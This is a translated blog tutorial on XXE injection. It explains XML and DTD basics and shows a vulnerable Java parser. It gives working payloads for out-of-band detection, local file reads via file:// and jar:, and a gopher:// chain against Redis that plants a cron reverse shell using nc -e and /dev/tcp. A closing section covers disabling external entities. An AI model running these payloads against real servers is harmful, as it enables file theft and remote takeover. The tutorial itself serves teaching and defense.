XXE principle, detailed explanation of utilization and repair

Foreword:

        The full name of XXE is XML external entity injection, which can also be called XML external entity injection. At present, the XML format is widely used in various functions of Web applications, including authentication, file transfer and image upload, and other functions.

        Generally speaking, XML is an extensible markup language used to transmit and store data. XXE is a marked external entity that allows attackers to view files on the file system of the application server, send data externally through the server, and then access some internal interfaces that cannot be accessed externally, similar to SSRF.

Vulnerability principle:

XML structure:

        To understand the cause of the XXE vulnerability, we first need to understand the structural characteristics of XML to better understand:

XML declaration:

        <?xml version=”1.0” standalone=”yes” encoding=”UTF-8”?>

        This is an XML processing instruction. Processing instructions begin with <? and end with ?>. The first word after <? is the command name, such as xml, which stands for XML declaration.
    version, standalone, and encoding are three features. The feature is a name-value pair separated by an equal sign. The left side of the equal sign is the feature name, and the right side of the equal sign is the value of the feature, enclosed in quotation marks. in

  • version: Indicates that this document conforms to the 1.0 specification
  • standalone: ​​Indicates that the document still needs to be imported from the outside in this file, and the value of standalone is set to yes, indicating that all documents are completed in this file 
  • encoding: refers to the document character encoding

 XML  root element definition:

        The tree structure of an XML document requires a root element. The start tag of the root element should be placed before the start tag of all other elements, and the end tag of the root element should be placed after the end tag of all other elements, such as

<?xml version="1.0" encoding="GB2312" standalone="no"?>
<users>
   <name>Zhang San</name>
</users>

XML element:

        The basic structure of an element consists of a start tag, data content, and an end tag, such as

<?xml version="1.0" encoding="GB2312" standalone="no"?>
<Person>
    <Name>Zhang San</Name>
    <Sex>Male</Sex>
</Person>

Among them, it should be noted that:

  • Element tags are case sensitive, <Name> and <name> are two different tags
  • Closing tags must have a backslash, like </Name>

XML element tag naming rules are as follows:

  • The name can contain letters, numbers and other letters
  • Name cannot start with a number or underscore
  • The name cannot start with xml
  • The name cannot contain spaces and colons

PI  (Processing Instruction):

        PI refers to Processing Instruction, processing instructions. PI starts with "<?" and ends with "?>", which is used to transmit information to downstream documents.

<?xml:stylesheet href=”core.css” type=”text/css” ?>

        The example shows that this XML document uses core.css to control the display.

PCDATA :

        #PCDATA : specifies that an element will contain parsed character data.
        Give an example to illustrate the usage of PCDATA , where movies.xml stores movie content data, and movies.dtd verifies movies.xml.

Example file (movies.dtd):

<?xml version="1.0" encoding="GB2312"?>
<!ELEMENT movies (id, name, brief, time)>
<!ATTLIST movies type CDATA #REQUIRED>
<!ELEMENT id (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT brief (#PCDATA)>
<!ELEMENT time (#PCDATA)>

id, name, brief, time can only contain non-markup text (cannot have their own child elements).

The XML file looks like this (movies.xml):

<?xml version="1.0" encoding="GB2312"?>
<!DOCTYPE movies SYSTEM "movies.dtd">
<movies type="movies">
    <id>1</id>
    <name>Deadly Cradle</name>
    <brief>Jet Li's latest masterpiece</brief>
    <time>2003</time>
</movies>

CDATA:

        CDATA is used when an entire block of text needs to be interpreted as plain character data rather than markup. CDATA can be very useful when some text contains many "<", ">", "&", """ characters instead of tags.

<Example>
    <![CDATA[
      <Person>
          <Name>ZhangSan</Name>
          <Sex>Male</Sex>
      </Person>
    ]]>
</Example>

Entities:

        Entities (entity) is the storage unit of XML, and an entity can be a string, a file, a database record, etc. The usefulness of entities is mainly to avoid repeated input in documents. We can define an entity name for a document, and then refer to the entity name in the document to replace the document. When XML parses the document, the entity name will be replaced with the corresponding document.

<!DOCTYPE example [
    <!ENTITY intro "Here is some comment for entity of XML">
]>
<example>
    <hello>&intro;</hello>
</example>

DOCTYPE 

        The DTD statement always starts with !DOCTYPE, followed by the name of the root element of the document after a blank space. Here is the key location of our XXE vulnerability. Here is a detailed explanation of the DTD, which is divided into:

  • Internal DTD
  • External DTD:
    • Private DTD: Use SYSTEM, followed by the URL of the external DTD.
    • Public DTD: Use PUBLIC, followed by the DTD public name, followed by the DTD's URL.

Internal DTD:

        First look at the format of the internal DTD:

<!DOCTYPE root element name[<!ELEMENT element name (element type definition)>]>

        For example, for the type definition of the following xml document, we can use the internal DTD format to check the nodes to determine whether the XML structure and data type are legal:

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!DOCTYPE poem [
    <!ELEMENT poem (title,author,line+)>
    <!ELEMENT title (#PCDATA)>
    <!ELEMENT author (#PCDATA)>
    <!ELEMENT line (#PCDATA)>
]>
<poem>
    <title>静夜思</title>
    <author>李白</author>
    <line>床前明月光,</line>
    <line>疑事地上霜.</line>
    <line>举头望明月,</line>
    <line>低头思故乡.</line>
</poem>

Private DTD of external DTD:

        If the DTD is placed inside the xml document, on the one hand, the xml document will become larger, and some programs may not need DTD information; on the other hand, it is not conducive to DTD sharing, and different xml documents may share this DTD. That's why the external DTD exists, the private DTD defines the method:

<!DOCTYPE root element name SYSTEM "URI of external DTD file">
<!DOCTYPE poem SYSTEM "http://test.com/poem.dtd">
<poem>
 <title>静夜思</title>
 <author>李白</author>
 <line>床前明月光,</line>
 <line>疑事地上霜.</line>
 <line>举头望明月,</line>
 <line>低头思故乡.</line>
 <commet>李白是中国最伟大的诗人!</commet>
</poem>

http://test.com/poem.dtd内容如下:
<?xml version="1.0" encoding="UTF-8"?>
<!ELEMENT poem (title,author,line+,commet)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT author (#PCDATA)>
<!ELEMENT line (#PCDATA)>
<!ELEMENT commet  (#PCDATA)>

        In this way, the server will go to the specified URL to find the dtd for analysis. It should be noted here that when we can control this URL, can we let the server access any of our servers, so the vulnerability of XXE is because external access is allowed. It will be explained in detail later.

Public DTD of external DTD:

       The public DTD is defined as follows, mainly using the keywords DOCTYPE, PUBLIC.

<!DOCTYPE root element name PUBLIC "DTD name" "URI of external DTD file">
<!DOCTYPE poem PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN" 
"http://www.test.org/poem.dtd">
<poem>
<title>静夜思</title>
<author>李白</author>
<line>床前明月光,</line>
<line>疑事地上霜.</line>
<line>举头望明月,</line>
<line>低头思故乡.</line>
<commet>李白是中国最伟大的诗人!</commet>
</poem>

        -//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN", this is the name of the public DTD. The naming of this thing is a bit particular. First of all, it starts with "-", indicating that this DTD is not a Developed by the standard organization. Then there is a double slash "//", followed by the name of the DTD owner. Obviously this DTD is set by the sun company. Then there is another double slash "//", and then followed by the DTD Described document type, it can be seen that this DTD describes the format of jsp tag library version 1.2. Followed by "//" and ISO 639 language identifier.

XXE vulnerability:

        With the above basic knowledge, we can actually find that the root cause of XXE is a series of security issues caused by the definition of an external DTD. Let's write a simple code to verify:

Server-side Java code:

public class Main {
    public static void main(String[] args) {

        Main main = new Main();
        XmlReader();
    }
    public static void XmlReader() {
        DocumentBuilderFactory domfac = DocumentBuilderFactory.newInstance();
        try {
            DocumentBuilder domBuilder = domfac.newDocumentBuilder();
            InputStream is = Files.newInputStream(new File("D:\\code\\xxetest\\xxe\\src\\main\\java\\org\\example\\test.xml").toPath());
            Document doc = domBuilder.parse(is);
            Element root = doc.getDocumentElement();
            NodeList users = root.getChildNodes();
            for (int i = 0; i < users.getLength(); i++) {
                Node user = users.item(i);
                if (user.getNodeType() == Node.ELEMENT_NODE) {
                    for (Node node = user.getFirstChild(); node != null; node = node
                            .getNextSibling()) {
                        if (node.getNodeType() == Node.ELEMENT_NODE) {
                            if (node.getNodeName().equals("name")) {
                                String name = node.getNodeValue();
                                String name1 = node.getFirstChild()
                                        .getNodeValue();
                                System.out.println("name==" + name);
                                System.out.println("name1==" + name1);
                            }
                            if (node.getNodeName().equals("price")) {
                                String price = node.getFirstChild()
                                        .getNodeValue();
                                System.out.println(price);
                            }
                        }
                    }
                }
            }
            NodeList node = root.getElementsByTagName("string");
            for (int i = 0; i < node.getLength(); i++) {
                Node str = node.item(i);
                String s = str.getFirstChild().getNodeValue();
                System.out.println(s);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }

    }

}

Here is the normal XML code:

<?xml version="1.0" encoding="GB2312" standalone="no"?>
<users>
    <user email="www.baidu.com">
        <name>张三</name>
        <age>18</age>
        <sex>男</sex>
    </user>
    <user>
        <name>李四</name>
        <age>16</age>
        <sex>女</sex>
    </user>
    <user>
        <name>王五</name>
        <age>25</age>
        <sex>不明</sex>
    </user>
</users>

After running, you can see the normal analysis:

But if we modify the content of xml:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poem SYSTEM "http://dxzxw3.dnslog.cn">
<poem></poem>

         Here, when parsing the xml we uploaded, we will visit dxzxw3.dnslog.cn, here we execute it to see if it is the same as we thought:

         It can be seen that our dnslog platform has been successfully accessed. Next, let's try to use the external reference of the public DTD to see if it can be successful:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poem PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN" 
"http://0zbc0e.dnslog.cn">
<poem></poem>

        After execution, we can also see the successful access to our DNSLOG platform:

        Here we can know that when we test whether there is a xxe vulnerability in the server, we only need to use the public or private DTD to check with the dnslog platform, the keyword is PUBLIC or SYSTEM, and the http header should be marked as xml analysis:

Content-Type: text/xml
Content-Type: application/xml

XXE Advanced:

        Above we mainly introduced how we can quickly detect whether a website has an XXE vulnerability. When the website does not have an echo, we can use the above to detect. When the website has an echo, how do we cooperate with other protocols for more Attack, how do we want to read system files, is the following way okay?

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
<users>
    <user>
        <name>李四</name>
        <age>16</age>
        <sex>女</sex>
    </user>
</users>

          It is wrong to write this way because we did not output the read file, and secondly, the read file does not meet the dtd detection and an error will be reported:

      Then how do we read the file, at this time, we need to use ENTITY to refer the read content to the correct label for input:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [
        <!ENTITY test SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
        ]>
<users>
    <user>
        <name>&test;</name>
        <age>16</age>
        <sex>女</sex>
    </user>
</users>

         After execution, we can see that the content has been successfully read and output:

         Alternatively the experimental public DTD is also available:

<!DOCTYPE users [
        <!ENTITY test PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.2//EN"
                "file:///c:/windows/system32/drivers/etc/hosts">
        ]>

        Then it can be said that as long as it is a supported protocol, we can use it:

        

        Here we test java, php, etc. without explanation. The last call in java is the URL module. The jdk1.8 url module only supports 7 protocols, but jdk1.7 supports 8 protocols.

jdk1.8支持: file,ftp,http,https,jar,mailto,netdoc
jdk1.7支持: file,ftp,http,https,jar,mailto,netdoc,gopher

        Although jdk1.7 supports gopher, it requires developers to enable support for this protocol, which is a bit tasteless.

The Jar protocol utilizes:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [
        <!ENTITY test SYSTEM "jar:file:///D:/test/drools-compiler.jar!/META-INF/MANIFEST.MF">
        ]>
<users>
    <user>
        <name>&test;</name>
        <age>16</age>
        <sex>女</sex>
    </user>
</users>

        It should be noted here that if the read content is a class file, it will cause an exception because there are special characters in the class or it is too large

When there is an ftp unauthorized vulnerability in the intranet, you can use the ftp protocol to read the directory:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [
        <!ENTITY test SYSTEM "ftp://127.0.0.1:21">
        ]>
<users>
    <user>
        <name>&test;</name>
    </user>
</users>

gopher protocol:

Although the jdk needs to be manually set to use the gopher protocol, it is still tested in the spirit of research. The gopher protocol is generally used to attack redis, mysql, fastcgi, smtp and other services         in the use of ssrf. Here we simply perform mysql test:

        gopher://ip:port/_TCP/IP data flow

Notice:

  • In the gopher protocol data stream, url encoding uses %0d%0a to replace the carriage return and line feed in the string
  • Use %0d%0a at the end of the data stream to represent the end of the message

Check the url code and you can see that it will judge whether it is a gopher protocol. If it is, it must be judged whether enableGopher is True:

 But here you can see that the default value is false, and here it is changed to true.

        Here I use the reflection method to modify, because its modifier is private static final, so use the following code to modify:

public class Main {

    private static Unsafe unsafe;

    static{
        try{
            final Field unsafeField = Unsafe.class.getDeclaredField("theUnsafe");
            unsafeField.setAccessible(true);
            unsafe = (Unsafe) unsafeField.get(null);
        }catch(Exception ex){
            ex.printStackTrace();
        }
    }

    public static void setFinalStatic(Field field, Object value) {
        try {
            Object fieldBase = unsafe.staticFieldBase(field);
            long fieldOffset = unsafe.staticFieldOffset(field);
            unsafe.putObject(fieldBase, fieldOffset, value);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) throws Exception {

        Main main = new Main();
        XmlReader();
    }

    public static void XmlReader() throws Exception {
        //URL url = new URL("gopher://192.168.4.243:6379");


        String class_name = "java.net.URL";
        Class urlclass = Class.forName(class_name);

        Field field = urlclass.getDeclaredField("enableGopher");

        field.setAccessible(true);
        boolean back = (boolean) field.get(urlclass);

        Main.setFinalStatic(field, true);

        DocumentBuilderFactory domfac = DocumentBuilderFactory.newInstance();
        try {
            DocumentBuilder domBuilder = domfac.newDocumentBuilder();
            InputStream is = Files.newInputStream(new File("D:\\code\\xxetest\\xxe\\src\\main\\java\\org\\example\\test.xml").toPath());

            Document doc = domBuilder.parse(is);
            Element root = doc.getDocumentElement();
            NodeList users = root.getChildNodes();
            for (int i = 0; i < users.getLength(); i++) {
                Node user = users.item(i);
                if (user.getNodeType() == Node.ELEMENT_NODE) {
                    for (Node node = user.getFirstChild(); node != null; node = node
                            .getNextSibling()) {
                        if (node.getNodeType() == Node.ELEMENT_NODE) {
                            if (node.getNodeName().equals("name")) {
                                String name = node.getNodeValue();
                                String name1 = node.getFirstChild()
                                        .getNodeValue();
                                System.out.println("name==" + name);
                                System.out.println("name1==" + name1);
                            }
                            if (node.getNodeName().equals("price")) {
                                String price = node.getFirstChild()
                                        .getNodeValue();
                                System.out.println(price);
                            }
                        }
                    }
                }
            }
            NodeList node = root.getElementsByTagName("string");
            for (int i = 0; i < node.getLength(); i++) {
                Node str = node.item(i);
                String s = str.getFirstChild().getNodeValue();
                System.out.println(s);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }

    }
}

Use Gopherus to generate:

 Put the generated into xml:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [
        <!ENTITY test SYSTEM "gopher://192.168.4.243:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2451%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20nc%20-e%20/bin/bash%20192.168.4.243%201234%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2424%0D%0A/var/spool/cron/crontabs%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A">
        ]>
<users>
    <user>
        <name>&test;</name>
        <age>16</age>
        <sex>女</sex>
    </user>
</users>

       Normally we add a scheduled task command:

set xx "\n* * * * * bash -i >& /dev/tcp/192.168.4.243/1234 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

Centos 的定时任务文件在 /var/spool/cron/<username>
Ubuntu 的定时任务文件在 /var/spool/cron/crontabs/<username>

        After running, you can see that a new root file is created under /var/spool/cron/crontabs:

 Successfully rebound the shell

 XXE defense:

         In fact, the defense of XXE is also very simple, as long as the utility DTD is prohibited from loading external entities

         There are currently three official protection modes:

javax.xml.XMLConstants.ACCESS_EXTERNAL_DTD: A list of protocols by which external DTDs and external entity references may be accessed.

javax.xml.XMLConstants.ACCESS_EXTERNAL_SCHEMA: A list of protocols via which external schema references, specified by the schemaLocation attribute of import and include elements, may be resolved.

javax.xml.XMLConstants.ACCESS_EXTERNAL_STYLESHEET: A list of protocols via which external references specified in stylesheet constructs such as processing instructions, document() functions, import elements, and include elements may be resolved.

        Just set it in the code, take DocumentBuilderFactory as an example:

String xml = "xxe.xml";
DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
DocumentBuilder builder = df.newDocumentBuilder();
Document document = builder.parse(new InputSource(xml));
DOMSource domSource = new DOMSource(document);

Summarize:

        In the test, as long as there is an upload point or a place where xml data is uploaded, there may be XXE vulnerabilities. According to the actual return situation, it can be judged whether the file can be read or the intranet scan can be performed.

        The principle of XXE's vulnerability is also very simple. In essence, the external reference function of xml may be used maliciously, and SSRF or local file reading vulnerabilities can be implemented according to the allowed protocol.

Guess you like

Origin blog.csdn.net/GalaxySpaceX/article/details/131792450